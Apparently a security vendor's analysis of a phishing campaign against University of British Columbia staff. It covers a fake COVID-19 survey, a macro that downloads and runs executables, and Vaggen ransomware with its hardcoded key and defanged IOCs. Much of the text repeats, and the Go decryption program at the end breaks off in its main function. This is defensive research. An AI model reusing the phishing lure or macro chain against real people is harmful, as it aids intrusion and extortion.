When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1495 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1496 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1497 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1498 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1499 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1500 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1501 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1502 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1503 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1504 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1505 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1506 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1507 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1508 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1509 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1510 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1511 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1512 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1513 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1514 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1515 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims in exchange for recovering their encrypted files.\r\nUpon discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful, thanks to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and Dropbox and used the sharing functionality of these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam coming from file-sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment to the file-sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code-hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe:\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe:\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell call to determine whether it succeeded (on success, the return value is the task ID of the launched application)\r\nIf successful, it sends an HTTP GET request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to be alerted when a particular event occurs.\r\nThis can be very useful as an early-warning system that an intruder has gained access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nOnce deployed, the ransomware starts encrypting the user’s files, appending the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD, to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, whose entry point is the function denoted ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -> main_enumDir\r\nmain_ELDBJORT -> main_encryptFile\r\nmain_SPRINGA -> main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nThe encryption and renaming of files is implemented as the callback of the standard Go library function path.filepath.Walk.\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom; the file content is encrypted with the gcm.Seal function.\r\nThe output file (with the .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements (the key from the binary, the nonce and tag from the file itself), we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low and, unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that use a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\nVariant 1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant 2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant 3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant 4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant 5:\r\ntemplate.dotm\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\n
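The Vaggen section above describes everything a recovery tool needs: the AES-256 key is embedded in the binary, and each .VAGGEN file carries its own 12-byte nonce followed by the ciphertext and the 16-byte GCM tag. The following Go program is an added example (not code from the post or from the malware) that parses that layout and decrypts it with the reported key; the sealing helper and the fixed-nonce sample file are constructed fixtures so the example runs offline, and the function names are the example's own.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
)

// VaggenKey is the hardcoded AES-256 key reported in the post (32 bytes).
const VaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	nonceSize = 12 // GCM nonce length described in the post
	tagSize   = 16 // GCM tag length described in the post
)

// DecryptVaggen parses the .VAGGEN layout (nonce || ciphertext || tag) and
// returns the recovered plaintext. gcm.Open verifies the tag, so a truncated,
// tampered or differently keyed file fails closed instead of yielding garbage.
func DecryptVaggen(key, blob []byte) ([]byte, error) {
	if len(blob) < nonceSize+tagSize {
		return nil, errors.New("file too short to contain a nonce and a GCM tag")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, blob[:nonceSize], blob[nonceSize:], nil)
}

// sealLayout produces a blob in the same layout. It exists only to build the
// constructed fixture below and is not the malware's code.
func sealLayout(key, nonce, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	out := make([]byte, nonceSize, nonceSize+len(plaintext)+tagSize)
	copy(out, nonce)
	// Appending to a copy of the nonce yields nonce || ciphertext || tag.
	return gcm.Seal(out, nonce, plaintext, nil), nil
}

// SamplePlaintext and SampleBlob are constructed fixtures. The nonce is fixed
// for reproducibility; the real sample drew it from CryptGenRandom.
const SamplePlaintext = "quarterly report draft, do not distribute"

func SampleBlob() []byte {
	nonce := []byte("0123456789ab") // 12 bytes, constructed
	blob, err := sealLayout([]byte(VaggenKey), nonce, []byte(SamplePlaintext))
	if err != nil {
		panic(err)
	}
	return blob
}

// TamperedBlob flips one bit in the tag so the integrity check fails.
func TamperedBlob() []byte {
	b := SampleBlob()
	b[len(b)-1] ^= 0x01
	return b
}

func main() {
	pt, err := DecryptVaggen([]byte(VaggenKey), SampleBlob())
	fmt.Printf("recovered: %q err=%v\n", pt, err)
	_, err = DecryptVaggen([]byte(VaggenKey), TamperedBlob())
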